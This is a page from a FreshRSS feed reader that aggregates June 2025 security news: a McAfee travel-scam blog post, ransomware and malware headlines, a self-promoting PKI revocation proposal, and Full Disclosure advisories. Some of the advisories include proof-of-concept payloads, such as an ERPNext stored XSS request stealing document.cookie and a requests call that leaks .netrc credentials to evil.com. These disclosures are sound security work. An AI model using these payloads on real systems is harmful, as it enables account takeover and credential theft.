FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Today — June 5th 2025Your RSS feeds

What to Do If You Book a Hotel or Airbnb and It Turns Out to Be a Scam

Summer vacation season is upon us, and millions of families are booking accommodations for their dream getaways. But with the surge in travel bookings comes an unfortunate reality: accommodation scams are on the rise, and they’re becoming increasingly sophisticated. As a cybersecurity professional, I’ve seen how devastating these scams can be—not just financially, but emotionally, when your family vacation turns into a nightmare.

The good news? With the right knowledge and proactive measures, you can protect yourself and your family from these predators. Even better, if you do fall victim to a scam, there are specific steps you can take to minimize the damage and potentially recover your losses.

The Harsh Reality: Travel Scams Are Exploding

Travel accommodation fraud has skyrocketed in recent years. Scammers have become expert at creating convincing fake listings on legitimate platforms like Airbnb, Booking.com, and even creating entirely fraudulent websites that mimic well-known hotel chains. They steal photos from real properties, craft compelling descriptions, and even create fake reviews to lure unsuspecting travelers.
What makes these scams particularly insidious is the emotional investment. You’re planning a special family vacation, perhaps saving for months, and the excitement of finding what seems like the “perfect” place clouds your judgment. Scammers exploit this vulnerability ruthlessly.

Red Flags: How to Spot a Scam Before You Book

I can tell you that prevention is always your best defense. Here are the warning signs that should make you pause before clicking “book now”:

Price Red Flags:

  • Prices are significantly below market rate for the area
  • Requests for payment outside the platform (via wire transfer, gift cards, or cryptocurrency)
  • Demands for large upfront payments or full payment before arrival
  • No clear cancellation policy or unreasonably strict terms

Property Red Flags:

  • Limited or professional-looking photos that seem too perfect
  • No street address provided, only general area descriptions
  • Lack of recent reviews or reviews that seem fake (overly generic language)
  • No contact information for the property beyond the initial booking contact

Booking Site Red Flags:

  • Websites with recent domain registration dates
  • No secure payment processing (look for “https” and padlock icons)
  • Missing contact information, terms of service, or privacy policies
  • Unprofessional website design or broken links

Immediate Action Steps If You Discover a Scam

If you’ve fallen victim to an accommodation scam, time is critical. Here’s what you need to do immediately:

Step 1: Document Everything (First 24 Hours)

  • Screenshot all communications, listings, confirmation emails, and payment receipts
  • Save any photos or descriptions from the original listing
  • Note exact dates, times, and methods of all communications
  • Create a detailed timeline of events

Step 2: Contact Your Financial Institution (Immediately)

  • Call your credit card company or bank to report the fraudulent charge
  • Request a chargeback or dispute the transaction
  • Ask to have your card frozen if you suspect further unauthorized access
  • Credit cards generally offer better fraud protection than debit cards

Step 3: Report to the Platform (Within 24-48 Hours)

  • Contact the booking platform’s customer service immediately
  • Provide all documentation you’ve gathered
  • Follow their specific fraud reporting procedures
  • Keep detailed records of all customer service interactions

Step 4: File Official Reports (Within 72 Hours)

  • Report to the Federal Trade Commission (FTC) at ReportFraud.ftc.gov
  • File a complaint with the Internet Crime Complaint Center (IC3.gov)
  • Contact local law enforcement if substantial money is involved
  • Report to your state’s attorney general’s office

Step 5: Monitor Your Accounts and Identity

  • Check all bank and credit card statements for unauthorized charges
  • Review your credit reports for any suspicious activity
  • Change passwords for any accounts that might have been compromised
  • Set up fraud alerts with credit bureaus
  • Long-Term Recovery and Protection Strategies
  • Beyond immediate damage control, you need to think about long-term protection for you and your family. This is where comprehensive digital protection becomes crucial.

How McAfee Can Protect Your Family from Travel Scams

One of the most effective ways to protect your family from travel scams and other online threats is to implement comprehensive digital protection. Solutions like McAfee’s family protection plans offer multiple layers of security that work together to keep scammers at bay.

Modern family protection services provide several key features that directly combat travel scams:

Real-Time Scam Protection: Advanced scam detection technology automatically identifies and blocks fraudulent websites, phishing emails, and suspicious links before you interact with them. This means if you accidentally click on a fake booking site, the protection software will warn you before you enter any personal information.

Secure VPN for Travel Research: When researching accommodations on public Wi-Fi networks (like those in airports or coffee shops), a VPN encrypts your connection, preventing scammers from intercepting your personal information or redirecting you to fake websites.

Financial Transaction Monitoring: Comprehensive protection plans monitor your bank accounts and credit cards for unusual activity, sending immediate alerts if suspicious transactions occur. This early warning system can help you catch fraudulent charges within hours rather than weeks.

Identity Monitoring and Dark Web Surveillance: These services continuously scan the dark web and other sources where stolen personal information is traded, alerting you if your data appears in places it shouldn’t. This is particularly valuable since accommodation scammers often sell stolen personal information to other criminals.

Personal Data Cleanup: Many protection services help identify and remove your personal information from data broker sites that scammers often use to research potential victims and make their approaches more convincing.
For families, comprehensive protection plans typically cover up to six family members, providing each person with their own monitoring and protection while giving parents oversight of their children’s online activities. With identity theft coverage up to $2 million per family and 24/7 restoration assistance, these services provide both prevention and recovery support.

The Bottom Line: Protection Is Worth the Investment

Twenty years in cybersecurity has taught me that the cost of prevention is always less than the cost of recovery. Whether it’s taking time to properly research accommodations, investing in comprehensive family protection software, or educating your family about scam tactics, these upfront investments pay dividends in peace of mind and financial security.

Travel scams prey on our excitement and trust during what should be joyful family times. By staying vigilant, using proper protection tools, and knowing how to respond quickly if something goes wrong, you can ensure your family’s summer vacation memories are made for all the right reasons.

Remember: legitimate accommodation providers want to build trust and will readily provide verification. If anyone pressures you to skip verification steps or pay through unusual methods, walk away. Your family’s safety and financial security are worth more than any “deal” that seems too good to be true.

Safe travels, and remember—the best vacation is one where the only surprises are pleasant ones.

The post What to Do If You Book a Hotel or Airbnb and It Turns Out to Be a Scam appeared first on McAfee Blog.

Play ransomware crims exploit SimpleHelp flaw in double-extortion schemes

Recompiled binaries and phone threats used to boost the pressure

Groups linked with the Play ransomware have exploited more than 900 organizations, the FBI said Wednesday, and have developed a number of new techniques in their double-extortion campaigns - including exploiting a security flaw in remote-access tool SimpleHelp if orgs haven't patched it.…

Yesterday — June 4th 2025Your RSS feeds

ICE Quietly Scales Back Rules for Courthouse Raids

A requirement that ICE agents ensure courthouse arrests don’t clash with state and local laws has been rescinded by the agency. ICE declined to explain what that means for future enforcement.

Ukraine strikes Russian bomber-maker with hack attack

Drones are not enough

Following a daring drone attack on Russian airfields, Ukrainian military intelligence has reportedly also hacked the servers of Tupolev, the Kremlin's strategic bomber maker.…

Ransomware scum leak patient data after disrupting chemo treatments at Kettering

Literally adding insult to injury

Kettering Health patients who had chemotherapy sessions and pre-surgery appointments canceled due to a ransomware attack in May now have to deal with the painful prospect that their personal info may have been leaked online.…

Qualcomm patches three exploited security flaws, but you could still be vulnerable

Device manufacturers must still apply the critical updates to their individual products, but we're not out of the woods yet.

Google Exposes Vishing Group UNC6040 Targeting Salesforce with Fake Data Loader App

Google has disclosed details of a financially motivated threat cluster that it said "specialises" in voice phishing (aka vishing) campaigns designed to breach organizations' Salesforce instances for large-scale data theft and subsequent extortion. The tech giant's threat intelligence team is tracking the activity under the moniker UNC6040, which it said exhibits characteristics that align with

Fake IT support calls hit 20 orgs, end in stolen Salesforce data and extortion, Google warns

Victims include hospitality, retail and education sectors

A group of financially motivated cyberscammers who specialize in Scattered-Spider-like fake IT support phone calls managed to trick employees at about 20 organizations into installing a modified version of Salesforce's Data Loader that allows the crims to steal sensitive data.…

Crims stole 40,000 people's data from our network, admits publisher Lee Enterprises

Did somebody say ransomware? Not the newspaper group, not even to deny it

Regional newspaper publisher Lee Enterprises says data belonging to around 40,000 people was stolen during an attack on its network earlier this year.…

Chaos RAT Malware Targets Windows and Linux via Fake Network Tool Downloads

Threat hunters are calling attention to a new variant of a remote access trojan (RAT) called Chaos RAT that has been used in recent attacks targeting Windows and Linux systems. According to findings from Acronis, the malware artifact may have been distributed by tricking victims into downloading a network troubleshooting utility for Linux environments. "Chaos RAT is an open-source RAT written in

Your SaaS Data Isn't Safe: Why Traditional DLP Solutions Fail in the Browser Era

By: Unknown
Traditional data leakage prevention (DLP) tools aren't keeping pace with the realities of how modern businesses use SaaS applications. Companies today rely heavily on SaaS platforms like Google Workspace, Salesforce, Slack, and generative AI tools, significantly altering the way sensitive information is handled. In these environments, data rarely appears as traditional files or crosses networks

The Race to Build Trump’s ‘Golden Dome’ Missile Defense System Is On

President Donald Trump has proposed building a massive antimissile system in space that could enrich Elon Musk if it materializes. But experts say the project’s feasibility remains unclear.

Malicious PyPI, npm, and Ruby Packages Exposed in Ongoing Open-Source Supply Chain Attacks

Several malicious packages have been uncovered across the npm, Python, and Ruby package repositories that drain funds from cryptocurrency wallets, erase entire codebases after installation, and exfiltrate Telegram API tokens, once again demonstrating the variety of supply chain threats lurking in open-source ecosystems. The findings come from multiple reports published by Checkmarx,

You're Not Ready

Seems bad out there. Unfortunately, it can always get worse. From evil hacker AI to world-changing cyberattacks, WIRED envisions the future you haven't prepared for.

Deepfake Scams Are Distorting Reality Itself

The easy access that scammers have to sophisticated AI tools means everything from emails to video calls can’t be trusted.

The US Grid Attack Looming on the Horizon

A major cyberattack on the US electrical grid has long worried security experts. Such an attack wouldn’t be easy. But if an adversary pulled it off, it’d be lights out in more ways than one.

The Texting Network for the End of the World

Everyone knows what it’s like to lose cell service. A burgeoning open source project called Meshtastic is filling the gap for when you’re in the middle of nowhere—or when disaster strikes.

See How Much Faster a Quantum Computer Will Crack Encryption

A quantum computer will likely one day be able to break the encryption protecting the world's secrets. See how much faster such a machine could decrypt a password compared to a present-day supercomputer.

A GPS Blackout Would Shut Down the World

GPS jamming and spoofing attacks are on the rise. If the global navigation system the US relies on were to go down entirely, it would send the world into unprecedented chaos.

The Rise of ‘Vibe Hacking’ Is the Next AI Nightmare

In the very near future, victory will belong to the savvy blackhat hacker who uses AI to generate code at scale.

UK CyberEM Command to spearhead new era of armed conflict

Government details latest initiative following announcement last week

Revealing more details about the Cyber and Electromagnetic (CyberEM) military domain, the UK's Ministry of Defence (MoD) says "there are pockets of excellence" but improvements must be made to ensure the country's capability meets the needs of national defense.…

Ukraine war spurred infosec vet Mikko Hyppönen to pivot to drones

Why? There's a war in Europe, Finland has a belligerent neighbor, and cyber is a settled field

Interview Mikko Hyppönen has spent the last 34 years creating security software that defends against criminals and state-backed actors, but now he's moving onto drone warfare.…

HPE Issues Security Patch for StoreOnce Bug Allowing Remote Authentication Bypass

Hewlett Packard Enterprise (HPE) has released security updates to address as many as eight vulnerabilities in its StoreOnce data backup and deduplication solution that could result in an authentication bypass and remote code execution. "These vulnerabilities could be remotely exploited to allow remote code execution, disclosure of information, server-side request forgery, authentication bypass,

‘Deliberate attack’ deletes shopping app’s AWS and GitHub resources

CEO of India's KiranaPro, which brings convenience stores online, vows to name the perp

The CEO of Indian grocery ordering app KiranaPro has claimed an attacker deleted its GitHub and AWS resources in a targeted and deliberate attack and vowed to name the perpetrator.…

Meta pauses mobile port tracking tech on Android after researchers cry foul

Zuckercorp and Yandex used localhost loophole to tie browser data to app users, say boffins

Security researchers say Meta and Yandex used native Android apps to listen on localhost ports, allowing them to link web browsing data to user identities and bypass typical privacy protections.…

You say Cozy Bear, I say Midnight Blizzard, Voodoo Bear, APT29 …

Microsoft, CrowdStrike, and pals promise clarity on cybercrew naming, deliver alias salad instead

Opinion Microsoft and CrowdStrike made a lot of noise on Monday about teaming up with other threat-intel outfits to "bring clarity to threat-actor naming."…

Before yesterdayYour RSS feeds

[RFC Draft] Built mathematical solution for PKI's 'impossible' problem. Response time: months→2 hours. IETF interest level: ¯\(ツ)/¯

TL;DR: Built a mathematical solution that cuts CA compromise response time from months to 2 hours. Just submitted to IETF. Watch them discuss it for 10+ years while dozens more DigiNotars happen.

The Problem That Keeps Me Up At Night

Working on a DNS-Security project, I realized something absolutely bonkers:

Nuclear power plants have SCRAM buttons. Airplanes have emergency procedures. The global PKI that secures the entire internet? Nope. If a Root CA gets pwned, we basically call everyone manually and hope for the best.

This problem has existed for 25+ years - since X.509 PKI was deployed in the 1990s. Every security expert knows it. Nobody fixed it.

When DigiNotar got hacked in 2011:

  • 3 months undetected (June → August)
  • Manual coordination with every browser vendor
  • 22 days for major browser updates
  • FOREVER for embedded systems
  • 531 fraudulent certificates. 300,000+ Iranian users monitored.

The Mathematical Paradox Everyone Gave Up On

Here's why nobody solved this:

"You can't revoke a trusted Root CA certificate, because it is self-signed by the CA and therefore there is no trusted mechanism by which to verify a CRL." - Stack Overflow PKI experts

The fundamental issue: Root CAs are trusted a priori - there's no higher authority to revoke them. If attackers compromise the private key, any "revocation CRL" would be signed by that same compromised key. Who do you trust?

For SubCAs: Manual coordination between Root CA and SubCA operators takes weeks while the compromise spreads through the hierarchy.

The PKI community literally accepted this as "architecturally impossible to solve." For 25 years.

My "Wait, What If..." Moment

But what if we make attackers help us solve their own paradox?

What if we design the system so that using the compromised key aggressively eventually triggers the CA's unavoidable suicide?

The Solution: RTO-Extension (Root-TurnOff Extension)

Fun fact: I originally wanted to call this the T800-Extension (Terminator-style "self-termination"), but I figured that would just cause trademark trouble. So for now it's the RTO-Extension aka RTO-CRL aka Root-TurnOff CRL - technically correct and legally safe! 🤖

I call it Certificate Authority Self-Revocation. Here's the elegant part:

  1. Root CAs AND SubCAs embed encrypted "monitoring URL" in their certificates (RTO-Extension)
  2. Extension gets inherited down the CA hierarchy
  3. Each CA level has independent automated monitoring every 6 hours
  4. Emergency signal triggers human verification at ANY level
  5. Manual authorization generates "Root-TurnOff CRL" (RTO-CRL) for that specific CA
  6. Compromised CA dies, clean CAs keep working
  7. Distributed defense: Every CA in the hierarchy can self-destruct independently!

The Beautiful Math:

  • Traditional: Root CA Compromise = Architecturally impossible to revoke
  • RTO-Extension: Root CA Compromise = Self-Limiting Attack
  • Distributed Defense: Each CA level = Independent immune system

I solved the "unsolvable" problem: Attackers can compromise a CA, but using it aggressively triggers that CA's mathematically unavoidable RTO-CRL suicide while other CAs remain operational.

Technical Implementation

Just submitted draft-jahnke-ca-self-revocation-04 to IETF:

RTO-Extension Structure:

  • AES-256-GCM encrypted monitoring URL
  • HKDF-SHA384 key derivation
  • EdDSA emergency signal authentication
  • Dual-person authorization required
  • Mathematical impossibility of RTO-CRL forgery

Emergency Timeline:

  • 0-15min: Automated detection
  • 15-45min: Human verification
  • 45-60min: Dual-person authorization
  • 1-2h: Root-TurnOff CRL distribution complete

Maximum exposure: 2 hours vs current 2+ months

Security Analysis

Threat Scenarios:

Attacker without CA key:

  • Cannot forge RTO-CRL (Root-TurnOff CRL)
  • Cannot bypass human authorization
  • No additional attack surface

Attacker with CA key:

  • Can issue fraudulent certificates (existing problem)
  • But aggressive use risks triggering that CA's RTO-CRL suicide
  • Other CAs in hierarchy remain operational
  • Attack becomes self-limiting with surgical precision

Game Theory:

Attackers face impossible economics:

  • Aggressive exploitation → Detection → RTO-CRL Self-termination
  • Conservative exploitation → Low ROI → Why bother?

Why This Fixes Everything

Current PKI Disasters:

  • DigiNotar: 3+ months uncontrolled
  • Symantec: Multi-year industry disruption
  • Manual CA revocation: Weeks of coordination between CA operators
  • Next incident: Same manual clusterfuck

With RTO-Extension:

  • Any compromised CA: 2-hour max exposure instead of months
  • Surgical containment: Only affected CA dies via RTO-CRL, others keep working
  • Distributed resilience: Defense in depth at every hierarchy level
  • Mathematical termination guarantee: Attackers trigger their own RTO-CRL destruction

The Insane IETF Paradox

Here's what pisses me off:

  • CVE Critical Patch: 48-hour global deployment
  • Architectural Security Improvement: 10+ years of committee discussions

The system is optimized for reacting to disasters instead of preventing them entirely.

Implementation Reality

Costs:

  • RTO-Extension emergency infrastructure: ~$85K per CA
  • Historical PKI disasters: $2-7 billion+ in global economic damage
  • DigiNotar bankruptcy: $50M+ direct losses
  • Symantec distrust: Forced certificate replacement for millions of websites
  • ROI: 50,000%+

Deployment:

  • Backward compatible (legacy CAs unaffected)
  • Optional RTO-Extension implementation (no forced upgrades)
  • Immediate benefits for early adopters

The Full Technical Specification

For the technical details, I've submitted the complete specification to the IETF as draft-jahnke-ca-self-revocation-04. It includes:

  • Complete ASN.1 definitions for the RTO-Extension certificate extension
  • Cryptographic protocol specifications (AES-256-GCM, HKDF-SHA384, EdDSA)
  • Operational procedures for emergency RTO-CRL response
  • Security analysis covering all threat models
  • Implementation examples (OpenSSL configuration, monitoring service code)
  • Deployment timeline and backwards compatibility strategy

The mathematical proof is solid: attackers with CA private keys can either use them conservatively (low impact) or aggressively (triggering RTO-CRL self-termination). Either way, the attack becomes economically unattractive and time-limited.

The Real Question

Every PKI expert reading this knows the Root CA revocation problem is real and "architecturally impossible." My RTO-Extension mathematical solution is elegant, implementable, and desperately needed.

So why will this take 10+ years to standardize while the next CA compromise gets patched in 2 days?

Because fixing symptoms gets panic-priority, but solving "impossible" architectural problems gets committee-priority.

The system is optimized for reacting to disasters instead of preventing them entirely.

What You Can Do

  • Read the spec: draft-jahnke-ca-self-revocation-04
  • PKI operators: DM me about RTO-Extension pilot testing
  • Security researchers: Please break my RTO-CRL math
  • IETF folks: Push this to LAMPS working group
  • Everyone: Upvote until IETF notices

Final Thought

We've been accepting months-long CA compromise windows as "just how PKI works."

It doesn't have to be this way.

The RTO-Extension math is sound. The implementation is ready. The only missing piece is urgency.

How many more DigiNotars before we solve the "unsolvable" problem?

EDIT: Holy shit, front page! Thanks for the gold!

For everyone asking "why didn't [big company] build this" - excellent question. My theory: they profit more from selling incident response than preventing incidents entirely.

EDIT 2: Yes, I know about Certificate Transparency. CT is detection after damage. The RTO-Extension is prevention before damage. Different problems.

EDIT 3: To the person who said "just use short-lived certificates" - sure, let me call every embedded device manufacturer and ask them to implement automatic renewal. I'll wait.

Currently building the RTO-Extension into the keweonDNS project. If you want to see a PKI with an actual emergency stop button, stay tuned.

Special thanks to my forum users at XDA-Developers - without you, this fundamental flaw would have never been spotted. Your sharp eyes and relentless questioning made this discovery possible!


[link] [comments]

Google quietly pushes emergency fix for Chrome 0-day as exploit runs wild

TAG team spotted the V8 bug first, so you can bet nation-states weren’t far behind

Google revealed Monday that it had quietly deployed a configuration change last week to block active exploitation of a Chrome zero-day.…

X's new 'encrypted' XChat feature seems no more secure than the failure that came before it

Musk's 'Bitcoin-style encryption' claim has experts scratching their heads

Elon Musk's X social media platform is rolling out a new version of its direct messaging feature that the platform owner said had a "whole new architecture," but as with many a Muskian proclamation, there's reason to doubt what's been said. …

Crooks fleece The North Face accounts with recycled logins

Outdoorsy brand blames credential stuffing

Joining the long queue of retailers dealing with cyber mishaps is outdoorsy fashion brand The North Face, which says crooks broke into some customer accounts using login creds pinched from breaches elsewhere.…

How the Farm Industry Spied on Animal Rights Activists and Pushed the FBI to Treat Them as Bioterrorists

For years, a powerful farm industry group served up information on activists to the FBI. Records reveal a decade-long effort to see the animal rights movement labeled a “bioterrorism” threat.

Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack

Threat hunters are alerting to a new campaign that employs deceptive websites to trick unsuspecting users into executing malicious PowerShell scripts on their machines and infect them with the NetSupport RAT malware. The DomainTools Investigations (DTI) team said it identified "malicious multi-stage downloader Powershell scripts" hosted on lure websites that masquerade as Gitcode and DocuSign. "

Defense in depth -- the Microsoft way (part 89): user group policies don't deserve tamper protection

Posted by Stefan Kanthak on Jun 03

Hi @ll,

user group policies are stored in DACL-protected registry keys
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies]
respectively [HKEY_CURRENT_USER\Software\Policies] and below, where
only the SYSTEM account and members of the "Administrators" user group
are granted write access.

At logon the user's registry hive "%USERPROFILE%\ntuser.dat" is loaded
with exclusive (read, write and...

CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0

Posted by Sanjay Singh on Jun 03

Hello Full Disclosure list,

I am sharing details of a newly assigned CVE affecting an open-source
educational software project:

------------------------------------------------------------------------
CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP
Project v1.0
------------------------------------------------------------------------

Product: CloudClassroom PHP Project
Vendor:...

Microsoft patches the patch that put Windows 11 in a coma

Out-of-band is becoming the norm rather than the exception

Microsoft is patching another patch that dumped some PCs into recovery mode with an unhelpful error code.…

ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page

Posted by Ron E on Jun 03

An authenticated attacker can inject JavaScript into the bio field of their
user profile. When the profile is viewed by another user, the injected
script executes.

*Proof of Concept:*

POST
/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info
HTTP/2
Host: --host--

profile_info={"bio":"\"><img src=x onerror=alert(document.cookie)>"}

ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path

Posted by Ron E on Jun 03

An authenticated user can inject malicious JavaScript into the user_image
field of the profile page using an XSS payload within the file path or HTML
context. This field is rendered without sufficient sanitization, allowing
stored script execution in the context of other authenticated users.

*Proof of Concept:*POST
/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info
HTTP/2
Host: --host--...

Local information disclosure in apport and systemd-coredump

Posted by Qualys Security Advisory via Fulldisclosure on Jun 03

Qualys Security Advisory

Local information disclosure in apport and systemd-coredump
(CVE-2025-5054 and CVE-2025-4598)

========================================================================
Contents
========================================================================

Summary
Mitigation
Local information disclosure in apport (CVE-2025-5054)
- Background
- Analysis
- Proof of concept
Local information disclosure in systemd-coredump...

Stored XSS via File Upload - adaptcmsv3.0.3

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS via File Upload #1:

Steps to Reproduce:

1. Login with low privilege user and visit "Profile" > "Edit Your Profile"

2. Click on "Choose File" and upload the following file

html-xss.html

<!DOCTYPE html>...

IDOR "Change Password" Functionality - adaptcmsv3.0.3

Posted by Andrey Stoykov on Jun 03

# Exploit Title: IDOR "Change Password" Functionality - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

IDOR "Change Password" Functionality #1:

Steps to Reproduce:

1. Login as user with low privilege and visit profile page
2. Select "Edit Your Profile" and click "Submit"
3. Trap the HTTP POST request
4. Set...

Stored XSS "Send Message" Functionality - adaptcmsv3.0.3

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Stored XSS "Send Message" Functionality - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS "Send Message" Functionality #1:

Steps to Reproduce:

1. Login as normal user and visit "Profile" > "Message" > "Send Message"
2. In "Message" field enter the...

Authenticated File Upload to RCE - adaptcmsv3.0.3

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Authenticated File Upload to RCE #1:

Steps to Reproduce:

1. Login as admin user and visit "System" > "Appearance" > "Themes" >
"Default" > "Theme Files" and choose "Add New File"...

Stored XSS in "Description" Functionality - cubecartv6.5.9

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Stored XSS in "Description" Functionality - cubecartv6.5.9
# Date: 05/2025
# Exploit Author: Andrey Stoykov
# Version: 6.5.9
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS #1:

Steps to Reproduce:

1. Visit "Account" > "Address Book" and choose "Edit"
2. In the "Description" parameter enter the following payload...

Multiple Vulnerabilities in SAP GuiXT Scripting

Posted by Michał Majchrowicz via Fulldisclosure on Jun 03

Security Advisory

Vulnerabilities reported to vendor: March 13, 2025
Vendor requested additional information: March 20, 2025
Additional information provided to vendor: March 22, 2025
Vendor confirmed the reported issues but rejected them: March 31, 2025
Additional information provided to vendor: May 6, 2025
Vendor confirmed the reported issues but rejected them: May 15, 2025
Vendor closed the tickets for all reported issues: May 16, 2025
Public...

Critical 10-Year-Old Roundcube Webmail Bug Allows Authenticated Users Run Malicious Code

Cybersecurity researchers have disclosed details of a critical security flaw in the Roundcube webmail software that has gone unnoticed for a decade and could be exploited to take over susceptible systems and execute arbitrary code. The vulnerability, tracked as CVE-2025-49113, carries a CVSS score of 9.9 out of 10.0. It has been described as a case of post-authenticated remote code execution via

Wyze's new Bulb Cam turns any light socket into a 2K camera - for just $50

The new Wyze Bulb Cam replaces light bulbs and offers extra security coverage built into a motion-activated smart light.

CVE-2024-47081: Netrc credential leak in PSF requests library

Posted by Juho Forsén via Fulldisclosure on Jun 03

The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc
credentials to third parties due to incorrect URL processing under specific conditions.

Issuing the following API call triggers the vulnerability:

requests.get('http://example.com:@evil.com/&apos;)

Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.

The root cause is...

Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)

Posted by Housma mardini on Jun 03

Hi,

I am submitting an exploit for *CVE-2019-9978*, a remote code execution
vulnerability in the Social Warfare WordPress plugin (version <= 3.5.2).

*Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare
WordPress Plugin (<= 3.5.2)

*Date*: 2025-05-20

*Exploit Author*: Huseyin Mardinli

*Vendor Homepage*: https://warfareplugins.com/

*Software Link*: https://wordpress.org/plugins/social-warfare/

*Version*: <= 3.5.2...

Youpot honeypot

Posted by Jacek Lipkowski via Fulldisclosure on Jun 03

Hi,

I made a novel honeypot for worms called Youpot.

Normally a honeypot will try to implement whatever service it thinks the
attacker would like. For a high interaction or pure honeypot this is often
impossible, because of the thousands of possibilities. Even a simple
telnet server will have thousands of variants: different banners,
different shells, different default passwords, on different IoT devices
etc.

Youpot works around this by...

Don’t let dormant accounts become a doorway for cybercriminals

Do you have online accounts you haven't used in years? If so, a bit of digital spring cleaning might be in order.

Illicit crypto-miners pouncing on lazy DevOps configs that leave clouds vulnerable

To stop the JINX-0132 gang behind these attacks, pay attention to HashiCorp, Docker, and Gitea security settings

Up to a quarter of all cloud users are at risk of having their computing resources stolen and used to illicitly mine for cryptocurrency, after crims cooked up a campaign that targets publicly accessible DevOps tools.…

Scattered Spider: Understanding Help Desk Scams and How to Defend Your Organization

By: Unknown
In the wake of high-profile attacks on UK retailers Marks & Spencer and Co-op, Scattered Spider has been all over the media, with coverage spilling over into the mainstream news due to the severity of the disruption caused — currently looking like hundreds of millions in lost profits for M&S alone.  This coverage is extremely valuable for the cybersecurity community as it raises

Bling slinger Cartier tells customers to be wary of phishing attacks after intrusion

Nothing terribly valuable taken in data heist, though privacy a little tarnished

Global jewelry giant Cartier is writing to customers to confirm their data was exposed to cybercriminals that broke into its systems.…

Android Trojan Crocodilus Now Active in 8 Countries, Targeting Banks and Crypto Wallets

A growing number of malicious campaigns have leveraged a recently discovered Android banking trojan called Crocodilus to target users in Europe and South America. The malware, according to a new report published by ThreatFabric, has also adopted improved obfuscation techniques to hinder analysis and detection, and includes the ability to create new contacts in the victim's contacts list. "Recent

Google Chrome to Distrust Two Certificate Authorities Over Compliance and Conduct Issues

Google has revealed that it will no longer trust digital certificates issued by Chunghwa Telecom and Netlock citing "patterns of concerning behavior observed over the past year." The changes are expected to be introduced in Chrome 139, which is scheduled for public release in early August 2025. The current major version is 137.  The update will affect all Transport Layer Security (TLS)
❌